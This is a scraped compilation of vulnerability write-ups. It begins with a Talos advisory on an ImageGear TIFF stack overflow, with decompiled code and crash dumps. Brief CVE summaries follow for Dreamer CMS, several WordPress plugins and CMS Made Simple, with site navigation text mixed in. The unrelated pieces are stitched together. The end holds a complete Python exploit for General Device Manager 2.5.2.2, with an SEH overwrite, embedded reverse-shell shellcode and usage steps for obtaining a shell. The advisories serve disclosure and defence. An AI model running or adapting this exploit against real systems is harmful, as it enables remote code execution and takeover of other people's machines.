A stack-based buffer overflow vulnerability exists in the tif_processing_dng_channel_count functionality of Accusoft ImageGear 20.1. A specially crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the tif\_processing\_dng\_channel\_count functionality of Accusoft ImageGear 20.1. A specially crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Accusoft ImageGear 20.1

**PRODUCT URLS**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 SCORE**

5.6 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

**CWE**

CWE-121 - Stack-based Buffer Overflow

**DETAILS**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

A specially crafted TIFF file can lead to a stack-based buffer overflow in tif_processing_dng_channel_count, due to a missing bounds check.

Trying to load a malformed TIFF, we end up in the following situation:

    (c74.ec0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000010 ebx=0ec9efe0 ecx=000003c8 edx=0ec9e000 esi=0ec9efe0 edi=001a0000
    eip=6f579a03 esp=0019faf4 ebp=0019fb34 iopl=0         nv up ei pl nz na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    igCore20d!IG_mpi_page_set+0x2d8e3:
    6f579a03 f3ab            rep stos dword ptr es:[edi]
    

As we can see below the stack is overwritten with some constant value 0x10:

    0:000> kb
     # ChildEBP RetAddr  Args to Child              
    WARNING: Stack unwind information not available. Following frames may be wrong.
    00 0019fb34 00000000 00000010 00000010 00000010 igCore20d!IG_mpi_page_set+0x2d8e3
    

The crash is happening in the function tif_processing_dng_channel_count with the following pseudo code at LINE36:

    LINE1   dword tif_processing_dng_channel_count
    LINE2                   (HIGEAR higear,int param_2,int param_3,int *param_4,int param_5)
    LINE3   {
    LINE4     int max_loop;
    LINE5     double *pdVar1;
    LINE6     int iVar2;
    LINE7     uint uVar3;
    LINE8     dword dVar4;
    LINE9     int iVar5;
    LINE10    int iVar6;
    LINE11    short *psVar7;
    LINE12    void **ppvVar8;
    LINE13    int iVar9;
    LINE14    int iVar10;
    LINE15    AT_INT *p_loc_at_int;
    LINE16    double dVar11;
    LINE17    double dVar13;
    LINE18    int local_28;
    LINE19    int local_24;
    LINE20    int local_20;
    LINE21    void **local_1c;
    LINE22    AT_INT _local_at_int [2];
    LINE23    double local_10;
    LINE24    uint local_8;
    LINE25    undefined auVar12 [16];
    LINE26    
    LINE27    local_8 = DAT_10319e74 ^ (uint)&stack0xfffffffc;
    LINE28    max_loop = get_channel_count(higear);
    LINE29    local_1c = (void **)0x0;
    LINE30    _local_at_int[0] = 0;
    LINE31    _local_at_int[1] = 0;
    LINE32    local_10 = 0.0;
    LINE33    if (0 < max_loop) {
    LINE34      p_loc_at_int = _local_at_int;
    LINE35      for (iVar5 = max_loop; iVar5 != 0; iVar5 = iVar5 + -1) {
    LINE36        *p_loc_at_int = 0x10;
    LINE37        p_loc_at_int = p_loc_at_int + 1;
    LINE38      }
    LINE39    }
    LINE40    iIG_image_channel_depths_change(higear,_local_at_int,1);
        [...]
    LINE148 }
    

This is a for loop with a bound size controlled by the variable max_loop LINE35. The pointer p_loc_at_int is pointing to a stack variable _local_at_int, which is a table of two integers.  
The max_loop is returned by the function get_channel_count LINE28, which is a wrapper, and returns a value directly read and controlled from the file. This can happen under specific circumstances with some malformed tags BitsPerSample, the max_loop corresponds to the SamplesPerPixel value. The presence of some other tags like DNGVersion and SubIFDs is a prerequisite to make this happen.  
As the loop is arbitrarily controlled and has no bounds checks, the command at LINE36 would write out-of-bounds on the stack, leading to memory corruption.

**Crash Information**

    0:000> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    *** WARNING: Unable to verify checksum for Fuzzme.exe
    
    KEY_VALUES_STRING: 1
    
        Key  : AV.Fault
        Value: Write
    
        Key  : Analysis.CPU.Sec
        Value: 1
    
        Key  : Analysis.DebugAnalysisProvider.CPP
        Value: Create: 8007007e on DESKTOP-I6GKV78
    
        Key  : Analysis.DebugData
        Value: CreateObject
    
        Key  : Analysis.DebugModel
        Value: CreateObject
    
        Key  : Analysis.Elapsed.Sec
        Value: 1
    
        Key  : Analysis.Memory.CommitPeak.Mb
        Value: 93
    
        Key  : Analysis.System
        Value: CreateObject
    
        Key  : Timeline.OS.Boot.DeltaSec
        Value: 1280404
    
        Key  : Timeline.Process.Start.DeltaSec
        Value: 101
    
    
    NTGLOBALFLAG:  2100000
    
    PROCESS_BAM_CURRENT_THROTTLED: 0
    
    PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APPLICATION_VERIFIER_LOADED: 1
    
    EXCEPTION_RECORD:  (.exr -1)
    ExceptionAddress: 6f579a03 (igCore20d!IG_mpi_page_set+0x0002d8e3)
       ExceptionCode: c0000005 (Access violation)
      ExceptionFlags: 00000000
    NumberParameters: 2
       Parameter[0]: 00000001
       Parameter[1]: 001a0000
    Attempt to write to address 001a0000
    
    FAULTING_THREAD:  00000ec0
    
    PROCESS_NAME:  Fuzzme.exe
    
    WRITE_ADDRESS:  001a0000 
    
    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    EXCEPTION_CODE_STR:  c0000005
    
    EXCEPTION_PARAMETER1:  00000001
    
    EXCEPTION_PARAMETER2:  001a0000
    
    STACK_TEXT:  
    0019fb34 00000000 00000010 00000010 00000010 igCore20d!IG_mpi_page_set+0x2d8e3
    
    
    STACK_COMMAND:  ~0s ; .cxr ; kb
    
    SYMBOL_NAME:  igCore20d!IG_mpi_page_set+2d8e3
    
    MODULE_NAME: igCore20d
    
    IMAGE_NAME:  igCore20d.dll
    
    FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_AVRF_c0000005_igCore20d.dll!IG_mpi_page_set
    
    OS_VERSION:  10.0.19041.1
    
    BUILDLAB_STR:  vb_release
    
    OSPLATFORM_TYPE:  x86
    
    OSNAME:  Windows 10
    
    FAILURE_ID_HASH:  {fe8f80f8-683f-d41f-7c33-712a409d5fb5}
    
    Followup:     MachineOwner
    ---------
    

**VENDOR RESPONSE**

Release notes from the vendor can be found here:

https://help.accusoft.com/ImageGear/v20.3/Windows/DLL/webframe.html#release-notes.html

https://help.accusoft.com/ImageGear/v20.3/Linux/webframe.html#release-notes.html

**TIMELINE**

2023-04-20 - Vendor Disclosure  
2023-09-20 - Vendor Patch Release  
2023-09-25 - Public Release

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2023-28393: TALOS-2023-1742 || Cisco Talos Intelligence Group

An out-of-bounds write vulnerability exists in the allocate_buffer_for_jpeg_decoding functionality of Accusoft ImageGear 20.1. A specially crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2023-40163: TALOS-2023-1836 || Cisco Talos Intelligence Group

Directory Traversal vulnerability in itechyou dreamer CMS v.4.1.3 allows a remote attacker to execute arbitrary code via the themePath in the uploaded template function.

**后台存在任意文件读取编辑漏洞**

使用模板管理功能时会拼接当前模板中的themePath,themePath来自于模板  
  
  

使用风格管理功能，上传新的主题包，并在theme.json中指定themePath为../../../../../../  
  

使用新主题包去访问模板管理功能，就可以造成目录穿越，并且可以编辑  

Java

1

https://gitee.com/iteachyou/dreamer\_cms.git

git@gitee.com:iteachyou/dreamer\_cms.git

iteachyou

dreamer\_cms

Dreamer CMS（梦想家CMS内容管理系统）

CVE-2023-43382: 后台存在任意文件读取编辑漏洞 · Issue #I821AI · www.iteachyou.cc/Dreamer CMS（梦想家CMS内容管理系统） - Gitee.com

The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

CVE-2023-4148

Cross-Site Scripting (XSS) vulnerability in cmsmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload injected into the Database Name, DataBase User or Database Port components.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-43339: CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation/README.md at main · sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation

The DoLogin Security WordPress plugin before 3.7 uses headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing.

CVE-2023-4631

The All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly check nonce values in several actions, allowing an attacker to perform CSRF attacks.

CVE-2023-3547

The Popup Builder WordPress plugin through 4.1.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

CVE-2023-3226

The WP Job Portal WordPress plugin before 2.0.6 does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

CVE-2023-4490

General Device Manager 2.5.2.2 is vulnerable to Buffer Overflow.

    # Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
    # Date: 30.07.2023
    # Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
    # Software Link 2:
    https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
    # Exploit Author: Ahmet Ümit BAYRAM
    # Tested Version: 2.5.2.2
    # Tested on: Windows 10 64bit
    
    # 1.- Run python code : exploit.py
    # 2.- Open pwned.txt and copy all content to clipboard
    # 3.- Open Device Manage and press Add Device
    # 4.- Paste the content of pwned.txt into the 'IP Address'
    # 5.- Click 'OK'
    # 6.- nc.exe local IP Port 1337 and you will have a bind shell
    # 7.- R.I.P. Condor <3
    
    import struct
    
    offset = b"A" * 1308
    
    nseh = b"\xEB\x06\x90\x90" # jmp short
    
    seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
    
    
    nops = b"\x90" * 32 
    
    #shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
    
    shellcode =  b""
    shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
    shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
    shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
    shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
    shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
    shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
    shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
    shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
    shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
    shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
    shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
    shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
    shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
    shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
    shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
    shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
    shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
    shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
    shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
    shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
    shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
    shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
    shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
    shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
    shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
    shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
    shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
    shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
    shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
    shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
    shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
    shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"
    
    
    final_payload = offset + nseh + seh + nops + shellcode
    
    # write the final payload to a file
    try:
        with open('pwned.txt', 'wb') as f:
            print("[+] Creating %s bytes evil payload..." %len(final_payload))
            f.write(final_payload)
            f.close()
            print("[+] File created!")
    except:
        print("File cannot be created!")

Source

CVE